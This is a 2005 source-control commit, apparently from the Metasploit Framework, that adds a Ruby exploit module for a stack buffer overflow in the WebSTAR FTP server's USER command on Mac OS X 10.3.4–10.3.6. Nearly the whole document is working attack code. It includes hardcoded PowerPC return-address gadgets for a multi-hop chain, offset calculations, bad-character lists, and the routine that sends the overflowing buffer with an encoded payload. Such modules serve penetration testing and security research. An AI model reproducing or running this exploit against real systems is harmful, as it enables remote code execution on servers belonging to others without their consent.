Relocated to subdirs, added webstar

git-svn-id: file:///home/svn/incoming/trunk@3104 4d416f70-5f16-0410-b530-b9f4589650da
2005-11-25 20:31:34 +00:00 · 2005-11-25 20:31:34 +00:00 · 9aa8854566
parent fb47661a8f
commit 9aa8854566
2 changed files with 98 additions and 0 deletions
--- a/modules/exploits/osx/afp/afp_loginext.rb
+++ b/modules/exploits/osx/afp/afp_loginext.rb
--- a/modules/exploits/osx/ftp/webstar_ftp_user.rb
+++ b/modules/exploits/osx/ftp/webstar_ftp_user.rb
@ -0,0 +1,98 @@
+require 'msf/core/exploit/ftp'
+
+module Msf
+
+class Exploits::OSX::Ftp::WebStarFTPUserOverflow < Msf::Exploit::Remote
+
+	include Exploit::Remote::Ftp
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'WebSTAR FTP Server USER Overflow',
+			'Description'    => %q{
+				This module exploits a stack overflow in the logging routine
+				of the WebSTAR FTP server. Reliable code execution is
+				obtained by a series of hops through the System library.
+					
+			},
+			'Author'         => [ 'Dino Dai Zovi <ddz [at] theta44.org>', 'hdm' ],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'OSVDB', '7794'],
+					[ 'BID', '10720'],
+					[ 'MIL', '76'],
+
+				],
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'Space'    => 300,
+					'BadChars' => "\x00\x20\x0a\x0d",
+					'Compat'   => { '+find' },
+				},
+			'Targets'        => 
+				[
+					[
+						'Mac OS X 10.3.4-10.3.6',
+						{
+							'Platform'     => 'osx',
+							'Arch'          => ARCH_PPC,
+							'Rets'          => [ 0x9008dce0, 0x90034d60, 0x900ca6d8, 0x90023590 ],
+						},
+					],
+				],
+			'DisclosureDate' => 'Jul 13 2004',
+			'DefaultTarget' => 0))
+
+	  	register_options(
+		[
+			OptString.new('MHOST', [ false, "Our IP address or hostname as the target resolves it" ]),
+		], self)
+					
+
+	end
+
+	# crazy dino 5-hop foo
+	#$ret = pack('N', 0x9008dce0); # call $r28, jump r1+120
+	#$r28 = pack('N', 0x90034d60); # getgid()
+	#$ptr = pack('N', 0x900ca6d8); # r3 = r1 + 64, call $r30
+	#$r30 = pack('N', 0x90023590); # call $r3
+
+	def exploit
+		connect
+		
+		# The offset to the return address is dependent on the length of our hostname
+		# as the target system resolves it ( IP or reverse DNS ).
+		mhost = datastore['MHOST'] || Rex::Socket.source_address(datastore['RHOST'])
+		basel =  285 - mhost.length
+		
+		print_status("Trying target #{target.name}...")
+
+		#  ret = 296
+		# r25  = 260
+		# r26  = 264
+		# r27  = 268
+		# r28  = 272
+		# r29  = 276
+		# r30  = 280
+		# r31  = 284
+
+		# r1+120 = 408
+		
+		buf                 = Rex::Text.rand_text_alphanum(basel + 136 + 56, payload_badchars)
+		buf[basel +  24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+120
+		buf[basel      , 4] = [ target['Rets'][1] ].pack('N') # getgid()
+		buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r30
+		buf[basel + 120, 4] = [ target['Rets'][3] ].pack('N') # call $r3
+		buf << payload.encoded
+
+		send_cmd( ['USER', buf] , true )
+		send_cmd( ['HELP'] , true )
+		
+		handler	
+		disconnect
+	end
+
+end
+end